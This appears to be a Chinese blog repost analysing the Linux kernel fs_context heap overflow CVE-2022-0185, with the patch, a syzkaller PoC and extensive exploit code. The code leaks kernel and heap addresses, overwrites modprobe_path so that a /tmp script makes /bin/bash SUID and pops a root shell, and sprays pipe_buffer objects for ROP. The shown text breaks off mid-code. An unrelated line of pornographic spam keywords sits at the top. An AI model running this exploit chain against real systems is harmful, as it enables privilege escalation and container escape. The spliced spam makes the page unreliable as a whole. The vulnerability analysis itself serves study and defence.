久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

CVE-2022-0185 价值$3w的 File System Context 内核整数溢出漏洞利用分析

發(fā)布時(shí)間:2024/3/26 编程问答 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CVE-2022-0185 价值$3w的 File System Context 内核整数溢出漏洞利用分析 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

文章目錄

    • 1. 漏洞發(fā)現(xiàn)
    • 2. 漏洞分析
    • 3. 漏洞利用方法1—任意寫篡改 `modprobe_path`
        • 3-1 泄露內(nèi)核基址
        • 3-2 任意地址寫思路
        • 3-3 FUSE 頁(yè)錯(cuò)誤處理
        • 3-4 完整利用
        • 3-5 改進(jìn)exploit
    • 4. 漏洞利用方法2—KCTF 提權(quán)
        • 4-1 泄露堆地址
        • 4-2 篡改 `pipe_buffer->ops`
        • 4-3 ROP 構(gòu)造并提權(quán)
        • 4-4 改進(jìn)exploit
      • 參考

本漏洞作者在kctf環(huán)境上成功完成了提權(quán)和逃逸,并獲得了 google kCTF vulnerability reward program 項(xiàng)目獎(jiǎng)勵(lì)的 31,337 美金的獎(jiǎng)勵(lì)(該項(xiàng)目對(duì)能從有 nsjail 沙箱的Linux內(nèi)核提權(quán),獎(jiǎng)勵(lì)31,337 到 91,337 美元,由于syzbot平臺(tái)上有人比作者早6天先發(fā)現(xiàn)了這個(gè)漏洞,作者并非首次發(fā)現(xiàn)該漏洞,只是完成了kctf提權(quán),便獲得了最低獎(jiǎng)金)。

影響版本:Linux-v5.1~v5.16.2。5.1-rc1 引入漏洞,Linux-v5.16.2已修補(bǔ) ,由syzkaller發(fā)現(xiàn)。評(píng)分8.4分

測(cè)試版本:Linux-5.16.1(失敗,msg_msg 和漏洞對(duì)象位于不同cache) Linux-5.11.22(成功) exploit及測(cè)試環(huán)境下載地址—https://github.com/bsauce/kernel-exploit-factory

編譯選項(xiàng)

CONFIG_CHECKPOINT_RESTORE, CONFIG_USER_NS, CONFIG_FUSE, CONFIG_SYSVIPC, CONFIG_USERFAULTFD

在編譯時(shí)將.config中的CONFIG_E1000和CONFIG_E1000E,變更為=y。參考

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.16.1.tar.xz $ tar -xvf linux-5.16.1.tar.xz # KASAN: 設(shè)置 make menuconfig 設(shè)置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger" $ make -j32 $ make all $ make modules # 編譯出的bzImage目錄:/arch/x86/boot/bzImage。

漏洞描述:內(nèi)核的 File System Context 模塊(文件系統(tǒng)環(huán)境)的fs/fs_context.c文件中存在整數(shù)溢出導(dǎo)致堆溢出。攻擊者必須具備 CAP_SYS_ADMIN 權(quán)限,或者使用命名空間或者使用unshare(CLONE_NEWNS|CLONE_NEWUSER) (等同于命令$ unshare -Urm)來(lái)進(jìn)入含有CAP_SYS_ADMIN權(quán)限的命名空間。docker中默認(rèn)沒(méi)有CAP_SYS_ADMIN權(quán)限(啟用容器時(shí)需使用 “-privileged” 選項(xiàng)),且docker的seccomp過(guò)濾會(huì)默認(rèn)攔截 unshare 命令,所以docker中無(wú)法利用;但是 Kubernetes 集群在使用docker時(shí),seccomp 過(guò)濾默認(rèn)是禁用的,可以提權(quán)和逃逸。

補(bǔ)丁:patch

diff --git a/fs/fs_context.c b/fs/fs_context.c index b7e43a780a625..24ce12f0db32e 100644 --- a/fs/fs_context.c +++ b/fs/fs_context.c @@ -548,7 +548,7 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)param->key);}- if (len > PAGE_SIZE - 2 - size) + if (size + len + 2 > PAGE_SIZE)return invalf(fc, "VFS: Legacy: Cumulative options too large");if (strchr(param->key, ',') ||(param->type == fs_value_is_string &&

保護(hù)機(jī)制:KASLR / SMEP / SMAP / KPTI。

利用總結(jié)

方法一:兩次觸發(fā)漏洞。缺點(diǎn)是一般普通用戶的話,FUSE不一定可用。

  • (1)先利用溢出修改 msg_msg->m_ts 泄露內(nèi)核基址(越界讀取 kmalloc-32 中的 seq_operations 結(jié)構(gòu));
  • (2)再利用FUSE 用戶頁(yè)錯(cuò)誤處理 和溢出篡改 msg_msg->next 實(shí)現(xiàn)任意地址寫,篡改 modprobe_path 提權(quán)。

方法二:缺點(diǎn)是需要三次觸發(fā)漏洞,堆噴不穩(wěn)定。

  • (1)先利用溢出修改 msg_msg->m_ts 泄露內(nèi)核基址(越界讀取 kmalloc-32 中的 seq_operations 結(jié)構(gòu));
  • (2)泄露堆地址:構(gòu)造queue1中 kmalloc-4k <-> kmalloc-64,queue2中 kmalloc-1k <-> kmalloc-64 <-> kmalloc-512 。觸發(fā)溢出漏洞,改大 kmalloc-4k 中的 msg_msg->m_ts 來(lái)越界讀取 msg->m_list.next & prev,也即 kmalloc-1024 和 kmalloc-512 的地址;
    • pipe_buffer 占據(jù) kmalloc-1024;
    • kmalloc-512 上布置 stack pivot gadget (偽造 pipe_buffer->ops 函數(shù)表);
  • (3)觸發(fā)溢出修改 msg_msg->next = &kmalloc-1024 - 0x30,構(gòu)造任意釋放,利用 msg_msg 堆噴偽造 pipe_buffer->ops 并布置 ROP chain 提權(quán)。

1. 漏洞發(fā)現(xiàn)

syzkaller報(bào)錯(cuò):通過(guò)syzkaller發(fā)現(xiàn)一個(gè)報(bào)錯(cuò)。

BUG: KASAN: slab-out-of-bounds in legacy_parse_param+0x450/0x640 fs/fs_context.c:569 Write of size 1 at addr ffff88802d7d9000 by task syz-executor.12/386100CPU: 3 PID: 386100 Comm: syz-executor.12 Not tainted 5.14.0 #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Call Trace:legacy_parse_param+0x450/0x640 fs/fs_context.c:569vfs_parse_fs_param+0x1fd/0x390 fs/fs_context.c:146vfs_fsconfig_locked+0x177/0x340 fs/fsopen.c:265__do_sys_fsconfig fs/fsopen.c:439 [inline] [ ... ] The buggy address belongs to the object at ffff88802d7d8000which belongs to the cache kmalloc-4k of size 4096 The buggy address is located 0 bytes to the right of4096-byte region [ffff88802d7d8000, ffff88802d7d9000)

漏洞對(duì)象位于 kmalloc-4096,legacy_parse_param() 函數(shù)導(dǎo)致OOB write,syzkaller生成了一個(gè)poC:

#define _GNU_SOURCE #include <endian.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_fsconfig #define __NR_fsconfig 431 #endif #ifndef __NR_fsopen #define __NR_fsopen 430 #endif uint64_t r[1] = {0xffffffffffffffff}; int main(void) {syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);intptr_t res = 0;memcpy((void*)0x20000000, "9p\000", 3);res = syscall(__NR_fsopen, 0x20000000ul, 0ul);if (res != -1)r[0] = res;memcpy((void*)0x20001c00, "\000\000\344]\233", 5);memcpy((void*)0x20000540, "<long string>", 641);syscall(__NR_fsconfig, r[0], 1ul, 0x20001c00ul, 0x20000540ul, 0ul);int i;for(i = 0; i < 64; i++) {syscall(__NR_fsconfig, r[0], 1ul, 0x20001c00ul, 0x20000540ul, 0ul);}memset((void*)0x20000040, 0, 1);memcpy((void*)0x20000800, "<long string>", 641);syscall(__NR_fsconfig, r[0], 1ul, 0x20000040ul, 0x20000800ul, 0ul);for(i = 0; i < 64; i++) {syscall(__NR_fsconfig, r[0], 1ul, 0x20000040ul, 0x20000800ul, 0ul);}return 0; }

PoC美化:這段PoC看上去很難理解,還包含一些無(wú)關(guān)的調(diào)用,只能通過(guò)人工分析來(lái)去除無(wú)關(guān)代碼。例如,mmap映射了很多區(qū)域,但只用到了0x20000000ul,所以可以去掉無(wú)關(guān)的mmap調(diào)用;uint64_t r[1] = {0xffffffffffffffff}; 實(shí)際上就是 int r = -1;還要將地址轉(zhuǎn)化為變量或常量,有的調(diào)用 memcpy() 將 9P 字符串拷貝到buffer并將該buffer傳給syscall,實(shí)際上我們可以直接傳字符串即可,不需要這么復(fù)雜,最終轉(zhuǎn)化為以下代碼:

int r = -1; int main(void) {int res = 0;res = syscall(__NR_fsopen, "9p", 0ul);if (res != -1)r = res; }

經(jīng)過(guò)很多分析,對(duì)比input和相關(guān)內(nèi)核函數(shù),最終生成一個(gè)簡(jiǎn)化的PoC:調(diào)用 fsconfig 需傳入 FSCONFIG_SET_STRING 和兩個(gè)字符串 key / value,value必須以NULL結(jié)尾,最后一個(gè)參數(shù)必須為0

#define _GNU_SOURCE #include <sys/syscall.h> #include <stdio.h> #include <stdlib.h> #ifndef __NR_fsconfig #define __NR_fsconfig 431 #endif #ifndef __NR_fsopen #define __NR_fsopen 430 #endif #define FSCONFIG_SET_STRING 1 #define fsopen(name, flags) syscall(__NR_fsopen, name, flags) #define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux) int main(void) { char* key = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";int fd = 0;fd = fsopen("9p", 0);for (int i = 0; i < 130; i++) { fsconfig(fd, FSCONFIG_SET_STRING, "\x00", key, 0);} }

2. 漏洞分析

漏洞函數(shù)調(diào)用路徑:__x64_sys_fsconfig() -> vfs_fsconfig_locked() -> vfs_parse_fs_param() -> legacy_parse_param()

注意 vfs_parse_fs_param() 中函數(shù)指針定義在 legacy_fs_context_ops 函數(shù)表中,在 alloc_fs_context() 函數(shù)中完成filesystem context 結(jié)構(gòu)的分配和初始化。

static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param) {struct legacy_fs_context *ctx = fc->fs_private; // [1] ctx 與文件描述符相關(guān)unsigned int size = ctx->data_size; // [2] size —— 目前已經(jīng)寫入 buffer 的長(zhǎng)度size_t len = 0;int ret;[ ... ]switch (param->type) {case fs_value_is_string:len = 1 + param->size; // [3] len = strlen(key) + 1 + strlen(value) 將要寫入的長(zhǎng)度, 對(duì)應(yīng)到 mount option string key=valuecase fs_value_is_flag:len += strlen(param->key);break;default:return invalf(fc, "VFS: Legacy: Parameter type for '%s' not supported", param->key);}if (len > PAGE_SIZE-2-size) return invalf(fc, "VFS: Legacy: Cumulative options too large"); // [4] 邊界檢查, 避免溢出[ ... ]if (!ctx->legacy_data) {ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL); // [5] 首次分配 4096 字節(jié)緩沖區(qū)if (!ctx->legacy_data) return -ENOMEM;}ctx->legacy_data[size++] = ','; // [6] 開(kāi)始往 buffer 寫數(shù)據(jù), 先寫個(gè)逗號(hào), 再寫 key, 再寫 等號(hào), 再寫 value, 最后結(jié)尾寫 NULL, 保存新的sizelen = strlen(param->key);memcpy(ctx->legacy_data + size, param->key, len);size += len;if (param->type == fs_value_is_string) {ctx->legacy_data[size++] = '=';memcpy(ctx->legacy_data + size, param->string, param->size);size += param->size;}ctx->legacy_data[size] = '\0';ctx->data_size = size;ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;return 0; }

9p / ext4 觸發(fā):fsopen() 打開(kāi)一個(gè)文件系統(tǒng)環(huán)境,用戶可以用來(lái)mount新的文件系統(tǒng)。 9p (the Plan 9 filesystem)是一種文件系統(tǒng),能觸發(fā)本文漏洞,Linux中常用的ext4文件系統(tǒng)也能觸發(fā)本漏洞(本文就是利用ext4來(lái)觸發(fā)漏洞)。fsconfig() 調(diào)用能讓我們往ctx->legacy_data 寫入一個(gè)新的 (key,value),ctx->legacy_data 指向一個(gè) 4096 字節(jié)的緩沖區(qū)(在首次配置文件系統(tǒng)時(shí)就進(jìn)行分配)。

漏洞分析:[4] 處 len > PAGE_SIZE-2-size, len是將要寫的長(zhǎng)度,PAGE_SIZE == 4096 ,size 是已寫的長(zhǎng)度,2字節(jié)表示一個(gè)逗號(hào)和一個(gè)NULL終止符。 問(wèn)題在于采用減法來(lái)進(jìn)行檢查,size是unsigned int (總是被當(dāng)做正值),會(huì)導(dǎo)致整數(shù)溢出,如果相減的結(jié)果小于0,還是會(huì)被包裝成一個(gè)正值。 如果117次添加長(zhǎng)度為0的key和長(zhǎng)度為33的value,最終的size則為(117*(33+2)) == 4095,這樣PAGE_SIZE-2-size == -1 == 18446744073709551615 ,這樣無(wú)論len多大都能滿足條件。key設(shè)置為 \x00,這樣逗號(hào)會(huì)寫入偏移4095,等號(hào)寫入下一個(gè)kmalloc-4096的偏移0處,接著就能往偏移1處開(kāi)始往后寫value。

漏洞限制:key和value都是string類型,會(huì)產(chǎn)生\x00截?cái)唷?梢圆捎胿alue來(lái)偽造 msg_msg->m_ts;只有采用key來(lái)偽造msg_msg->m_list.next。因?yàn)?value 只能從鄰近堆塊(kmalloc-4096)的偏移1處開(kāi)始覆蓋,因?yàn)榈?個(gè)逗號(hào) , 會(huì)寫在漏洞對(duì)象的偏移 4095,等號(hào)會(huì)寫在鄰近堆塊的偏移0處,所以如果要正確偽造 msg_msg->m_list.next,則只能利用key來(lái)傳值。


3. 漏洞利用方法1—任意寫篡改 modprobe_path

3-1 泄露內(nèi)核基址

泄露內(nèi)核基址:噴射大量 seq_operations —— open(“/proc/self/stat”, O_RDONLY) ,溢出篡改 msg_msg->m_ts 泄露地址。具體步驟如下。

  • (1)準(zhǔn)備 fs_context 漏洞對(duì)象;
  • (2)往 kmalloc-32 噴射 seq_operations 對(duì)象;
  • (3)噴射 msg_msg 消息 (大小為 0xfe8),會(huì)將輔助消息分配在 kmalloc-32;
  • (4)觸發(fā) kmalloc-4096 溢出,篡改 msg_msg->m_ts;
  • (5)利用 msg_msg 越界讀。泄露內(nèi)核指針。
void *do_kaslr_leak () {uint64_t kbase = 0;char pat[0x30] = {0};char buffer[0x2000] = {0}, received[0x2000] = {0};msg *message = (msg *)buffer;int size = 0x1018;int targets[K_SPRAY] = {0};int i;// Spray queues/messagesfor (i = 0; i < K_SPRAY; i++) {memset(buffer, 0x41+i, sizeof(buffer));targets[i] = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);send_msg(targets[i], message, size - 0x30, 0);}// Spray function pointersfor (int i = 0; i < 100; i++) {open("/proc/self/stat", O_RDONLY);}get_msg(targets[0], received, size - 0x30, 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);memset(pat, 0x42, sizeof(pat));pat[sizeof(pat)-1] = '\x00';fd = fsopen("ext4", 0);if (fd < 0) {exit(-1);}strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");for (int i = 0; i < 117; i++) {fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);}// Corrupt the size field to 0x1060char tiny[] = "DDDDDDD";char tiny_evil[] = "DDDDDD\x60\x10";fsconfig(fd, FSCONFIG_SET_STRING, "CCCCCCCC", tiny, 0);fsconfig(fd, FSCONFIG_SET_STRING, "\x00", tiny_evil, 0);size = 0x1060;for (int i = 0; i < K_SPRAY; i++) {get_msg(targets[i], received, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);// Check for valid kernel pointer and aligned basekbase = do_check_leak(received);if (kbase) {return (void*)kbase;}}puts("[X] No leaks, trying again");close(fd);return 0; }

3-2 任意地址寫思路

任意寫:利用競(jìng)爭(zhēng)條件。

  • (1)分配第1個(gè)消息塊;
  • (2)拷貝第1個(gè)消息,觸發(fā)頁(yè)錯(cuò)誤暫停;
  • (3)分配第2個(gè)消息塊;
  • (4)覆蓋第1個(gè)消息的next指針;
  • (5)我們的數(shù)據(jù)被拷貝到next指針指向的地址。

我們要確保(4)發(fā)生在(5)之前,可以用 userfaultfd,但是5.11版本以后就無(wú)法在用戶層處理內(nèi)核層的頁(yè)錯(cuò)誤了;還有種方法是利用FUSE。

3-3 FUSE 頁(yè)錯(cuò)誤處理

FUSE簡(jiǎn)介:內(nèi)核允許用戶實(shí)現(xiàn)自己的用戶態(tài)文件系統(tǒng)(Filsystem in USErspace),有自己的read / write 系統(tǒng)調(diào)用,這樣發(fā)生缺頁(yè)時(shí)還是會(huì)回到用戶態(tài)來(lái)處理中斷。我們可以實(shí)現(xiàn)一個(gè)迷你的 FUSE 文件系統(tǒng)(通過(guò)和/dev/fuse交互),打開(kāi)并調(diào)用mmap映射到內(nèi)存,將返回地址傳到內(nèi)核,當(dāng)內(nèi)核嘗試讀取FUSE中的地址時(shí),會(huì)調(diào)用我們定義的 read 處理函數(shù),為了只在讀第一個(gè)4096堆塊數(shù)據(jù)之后觸發(fā)頁(yè)錯(cuò)誤,我們將分配兩塊內(nèi)存,第一塊是常規(guī)內(nèi)存,第2塊是FUSE相關(guān)的。

問(wèn)題:一是FUSE要求我們非特權(quán)用戶能訪問(wèn) /bin/fusermount,通過(guò)unshare能繞過(guò)該限制;二是用戶需要寫個(gè) libfuse 庫(kù)使 libfuse 函數(shù)正常工作,但是 libfuse 很難靜態(tài)鏈接 (見(jiàn) issue,因?yàn)橐蕾囉?dl_open)作者直接移除了所有對(duì) dl_open 的引用,并重新編譯了 libfuse 庫(kù),這樣FUSE技術(shù)就能應(yīng)用于所有開(kāi)啟 CONFIG_FUSE 的內(nèi)核了。

void *evil_page = mmap(0x1337000, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); uint64_t race_page = 0x1338000; puts("[*] Preparing fault handlers via FUSE"); int evil_fd = open("evil/evil", O_RDWR); if (evil_fd < 0) {perror("evil fd failed");exit(-1); } if ((mmap(0x1338000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, evil_fd, 0)) != 0x1338000) {perror("mmap fail fuse 1");exit(-1); }

3-4 完整利用

總體利用步驟

  • (1)打開(kāi)pipe對(duì),兩個(gè)進(jìn)程共享一塊可發(fā)送數(shù)據(jù)的內(nèi)存,可用于同步(保證篡改msg_msg->next 之后再處理用戶頁(yè)錯(cuò)誤,繼續(xù)拷貝以篡改 modprobe_path);
  • (2)在exp中fork出子進(jìn)程用于運(yùn)行FUSE,處理文件系統(tǒng)請(qǐng)求;
  • (3)泄露內(nèi)核基址(見(jiàn) 3-1 地址泄露步驟);
  • (4)open/mmap evil file(將fusefd映射到地址0x1338000,這樣msg copy 訪問(wèn)到該地址時(shí)觸發(fā)頁(yè)錯(cuò)誤處理);
  • (5)準(zhǔn)備堆溢出,調(diào)用 fsopen 和 fsconfig;
  • (6)創(chuàng)建子線程溢出覆蓋 next 指針;
  • (7)同時(shí),主線程觸發(fā) msg_send,讓步于FUSE代碼來(lái)處理頁(yè)錯(cuò)誤;
  • (8)FUSE在共享pipe上調(diào)用read,觸發(fā)阻塞,直到有字節(jié)寫入pipe;
  • (9)到這里,溢出線程寫入pipe(表示 msg_msg->next 已被篡改),導(dǎo)致FUSE釋放,線程將惡意數(shù)據(jù)拷貝到目標(biāo)地址。

寫目標(biāo):modprobe_path。

char *modprobe_win = "/tmp/w"; #define SHELL "/bin/bash" [ ... ] void modprobe_init() {int fd;[ ... ]char w[] = "#!/bin/sh\nchmod u+s " SHELL "\n";chmod(modprobe_trigger, 0777);fd = open(modprobe_win, O_RDWR | O_CREAT);if (fd < 0) {perror("winner creation failed");exit(-1);}write(fd, w, sizeof(w));close(fd);chmod(modprobe_win, 0777);return; }

觸發(fā) modprobe_path:執(zhí)行一個(gè)含未知字節(jié)的binary,內(nèi)核就會(huì)利用modprobe去尋找一個(gè)module來(lái)加載該binary。

// 內(nèi)核源碼 do_execve return do_execveat_common(fd, filename, argv, envp, flags); do_execveat_common retval = bprm_execve(bprm, fd, filename, flags); bprm_execve retval = exec_binprm(bprm); exec_binrpm ret = search_binary_handler(bprm); search_binary_handler if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0) request_module ret = call_modprobe(module_name, wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC); call_modprobe static int call_modprobe(char *module_name, int wait) {struct subprocess_info *info;static char *envp[] = {"HOME=/","TERM=linux","PATH=/sbin:/usr/sbin:/bin:/usr/bin",NULL};char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);module_name = kstrdup(module_name, GFP_KERNEL);argv[0] = modprobe_path; // <--- overwritten!argv[1] = "-q";argv[2] = "--";argv[3] = module_name;argv[4] = NULL;info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL, NULL, free_modprobe_argv, NULL);return call_usermodehelper_exec(info, wait | UMH_KILLABLE); }// exp 中代碼 char *modprobe_trigger = "/tmp/root"; void modprobe_init() {int fd = open(modprobe_trigger, O_RDWR | O_CREAT);char root[] = "\xff\xff\xff\xff";write(fd, root, sizeof(root));close(fd);chmod(modprobe_trigger, 0777);[ ... ] } void modprobe_hax() {puts("[*] Attempting to trigger modprobe");execve(modprobe_trigger, NULL, NULL); } To finish up, we repeatedly attempt to trigger the overwrite and trigger modprobe_path. We can verify if it has succeeded by checking the permissions on /bin/bash: while (1) {do_win();modprobe_hax();struct stat check;// Get permissions on filestat(SHELL, &check);if (check.st_mode & S_ISUID) {break;} } puts("[*] Exploit success! " SHELL " is SUID now!"); puts("[+] Popping shell"); execve(SHELL, root_argv, NULL);

問(wèn)題:原作者的測(cè)試環(huán)境是Ubuntu-20.04,但在我編譯的環(huán)境中(版本v5.16.1),堆噴非常不穩(wěn)定,需要改善堆噴策略。我沿用了 CVE-2021-42008的策略還是不行,不能確保漏洞對(duì)象的后面跟著一個(gè) kmalloc-4096 的 msg_msg ,發(fā)現(xiàn) msg_msg 和漏洞對(duì)象總是位于不同的cache,很奇怪。希望有大佬能弄清為什么,玄學(xué)!

換了個(gè)版本 v5.11.22,偶然成功了一次(成功賦予了busybox s權(quán)限),調(diào)試后發(fā)現(xiàn) msg_msg 和漏洞對(duì)象可以位于同一cache:

3-5 改進(jìn)exploit

改進(jìn)提權(quán)方式:原先只是給 /bin/su 加了個(gè)suid,現(xiàn)在直接提權(quán)。

改進(jìn)堆噴策略:原先在篡改 msg_msg->next 時(shí),每次嘗試,都先申請(qǐng)1個(gè)漏洞對(duì)象,然后再申請(qǐng)1個(gè) msg_msg 對(duì)象,很難碰撞到 msg_msg 恰好在漏洞對(duì)象后面的情況。現(xiàn)在我一次申請(qǐng)10個(gè)漏洞對(duì)象,然后再申請(qǐng)1個(gè) msg_msg 對(duì)象,10次溢出總有一次能成功篡改 msg_msg->next 吧。果然,只要幾次嘗試就能成功篡改 modprobe_path:

for (int i = 0; i < 0xa; i++){fdv[i] = fsopen("ext4", 0);if (fdv[i] < 0) {puts("Opening");exit(-1);}for (int j = 0; j < 117; j++) fsconfig(fdv[i], FSCONFIG_SET_STRING, "\x00", pat, 0);}


4. 漏洞利用方法2—KCTF 提權(quán)

說(shuō)明一下,作者用在KCTF環(huán)境上的提權(quán)方法,在普通系統(tǒng)上也能使用,我覺(jué)得這種方法更好一點(diǎn),因?yàn)橛行┫到y(tǒng)上不一定有userfault和fuse權(quán)限。

KCTF要求:有兩種要求,一是kctf,在容器上提權(quán)并讀取flag,二是fullchain,在容器上提權(quán),逃逸到host,再讀取另一個(gè)容器的flag。

KCTF難點(diǎn)

  • /dev 目錄東西很少,FUSE和一些結(jié)構(gòu)如 tty_struct 不能使用,userfault 也被禁用,有很多4k的對(duì)象,所以需要調(diào)整堆噴策略。
  • 另一個(gè)問(wèn)題是 GFP_KERNEL_ACCOUNT flag,這個(gè)flag用于標(biāo)記data來(lái)自用戶層的對(duì)象,例如 msg_msg,5.9以前,內(nèi)核會(huì)把這類對(duì)象放在單獨(dú)的slab(前提是設(shè)置 CONFIG_MEMCG_KMEM 編譯選項(xiàng))。其實(shí)本文涉及到的legacy漏洞對(duì)象也應(yīng)該用 accounting flag 進(jìn)行標(biāo)識(shí),可能是開(kāi)發(fā)者搞忘了,直到 commit for 5.16 才加上,這意味著在kctf這個(gè) 5.4 的老版本上不能使用 msg_msg 對(duì)象了,幸運(yùn)的是kctf最近將內(nèi)核更新到了 5.10,現(xiàn)在 msg_msg 對(duì)象可用了。(PS:Starlabs 團(tuán)隊(duì)的 n0psledbyte 曾在老版本的kctf環(huán)境上用 msg_msg 來(lái)實(shí)現(xiàn) cross cache overflow,該策略可以參考 grsecurity 的這篇文章 —— article)

利用方法選擇:由于環(huán)境限制,不能用 msg_msg 實(shí)現(xiàn)任意寫了,現(xiàn)在可以采用 msg_msg 提供的 unlink 原語(yǔ) 或者 任意釋放原語(yǔ)。最后打算篡改 pipe_buffer 的函數(shù)表指針指向某個(gè) msg_msg chunk (參考 CVE-2021-22555 的方法)。

小trick:salt 工具便于調(diào)試內(nèi)核堆。首先,調(diào)用set_affility() 綁定到一個(gè)CPU核上運(yùn)行(因?yàn)槊總€(gè)CPU都有自己的freelist),以下策略是針對(duì)kCTF環(huán)境的:

  • 提前堆噴很多 msg_msg ,適時(shí)的釋放部分 msg_msg 來(lái)利用;
  • 從 fsconfig 溢出 msg_msg 之前,先分配4到7個(gè) msg_msg(因?yàn)?kmalloc-4k slab中只有8個(gè)對(duì)象),再對(duì)其中一個(gè) msg_msg 觸發(fā) MSG_COPY,會(huì)在copy時(shí)對(duì)同一slab進(jìn)行分配和釋放,這樣就會(huì)在slab中產(chǎn)生一個(gè)hole,下一次分配legacy對(duì)象時(shí)就會(huì)占據(jù)這個(gè)hole。

4-1 泄露堆地址

堆地址泄露: msg_queue 會(huì)把 msg_msg 以雙鏈表串起來(lái),可以分配兩個(gè)queue,queue1中 kmalloc-4k <-> kmalloc-64,queue2中 kmalloc-1k <-> kmalloc-64 <-> kmalloc-512 ,利用 OOB read 來(lái)泄露 kmalloc-512 和 kmalloc-1k 對(duì)象的地址(也就是 kmalloc-64 的 msg_msg->m_list.next / prev),如下圖所示:

利用堆溢出篡改 queue1 中 kmalloc-4k 的 msg_msg->m_ts 并采用 MSG_COPY 進(jìn)行 OOB read

可以根據(jù) msg_msg 包含的內(nèi)容來(lái)判斷泄露的地址屬于哪一個(gè) msg_queue,這樣就能選擇性的釋放并噴射 pipe_buffer 對(duì)象占據(jù) kmalloc-1k,在 kmalloc-512 上布置 stack pivot gadget。

以下代碼可以泄露堆地址:

double_heap_leaks do_heap_leaks() {uint64_t kmalloc_1024 = 0;uint64_t kmalloc_512 = 0;char pivot_spray[0x2000] = {0};uint64_t *pivot_spray_ptr = (uint64_t *)pivot_spray;double_heap_leaks leaks = {0};int linked_msg[256] = {0};char pat[0x1000] = {0};char buffer[0x2000] = {0}, recieved[0x2000] = {0};msg *message = (msg *)buffer;// spray kmalloc-512 linked to kmalloc-64 linked to kmalloc-1k in unique msg queuesfor (int i = 0; i < 255; i++) {linked_msg[i] = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);memset(pivot_spray, 0x0, sizeof(pivot_spray));pivot_spray_ptr[0] = 1;for (int i = 0; i < 10;i ++){pivot_spray_ptr[i+1] = stack_pivot;}// spray pivots using kmalloc-512 allocationssend_msg(linked_msg[i], pivot_spray, 0x200 - 0x30, 0);memset(buffer, 0x1+i, sizeof(buffer));message->mtype = 2;send_msg(linked_msg[i], message, 0x40 - 0x30, 0);message->mtype = 3;send_msg(linked_msg[i], message, 0x400 - 0x30 - 0x40, 0);}int size = 0x1038;int targets[H_SPRAY] = {0};for (int i = 0; i < H_SPRAY; i++) {memset(buffer, 0x41+i, sizeof(buffer));targets[i] = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);send_msg(targets[i], message, size - 0x30, 0);}// create hole hopefullyget_msg(targets[0], recieved, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);puts("[*] Opening ext4 filesystem");fd = fsopen("ext4", 0);if (fd < 0) {puts("fsopen: Remember to unshare");exit(-1);}strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");for (int i = 0; i < 117; i++) {fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);}// fill it a bit to help prevent potential crashes on MSG_COPYstuff_4k(16);puts("[*] Overflowing...");pat[21] = '\x00';char evil[] = "\x60\x19";fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);fsconfig(fd, FSCONFIG_SET_STRING, "\x00", evil, 0);puts("[*] Done heap overflow");size = 0x1960;puts("[*] Receiving corrupted size and leak data");// go through all targets qids and check if we hopefully get a leakfor (int i = 0; i < H_SPRAY; i++) {get_msg(targets[i], recieved, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);for (int j = 0x202; j < 0x202 + (0x1960-0x1010) / 8; j++){uint64_t *dump = (uint64_t *)recieved;if (dump[j] == 0x2 && dump[j+1] == 0x10 && dump[j+4] == dump[j+5]){kmalloc_1024 = dump[j-2];kmalloc_512 = dump[j-1];// delete chunk 1024, chunk 512 already has sprayed pivotsuint8_t target_idx = (dump[j+4] & 0xff) - 1;get_msg(linked_msg[target_idx], recieved, 0x400 - 0x30, 3, IPC_NOWAIT | MSG_NOERROR);// spray to replace with pipe_buffer, thanks LIFO!for (int k = 0; k < PIPES; k++){if (pipe(pipefd[k]) < 0){perror("pipe failed");exit(-1);}write(pipefd[k][1], "pwnage", 7);}break;}}if (kmalloc_1024 != 0){break;}}close(fd);if (!kmalloc_1024){puts("[X] No leaks, trying again");stuff_4k(16);return leaks;}leaks.kmalloc_1024_leak = 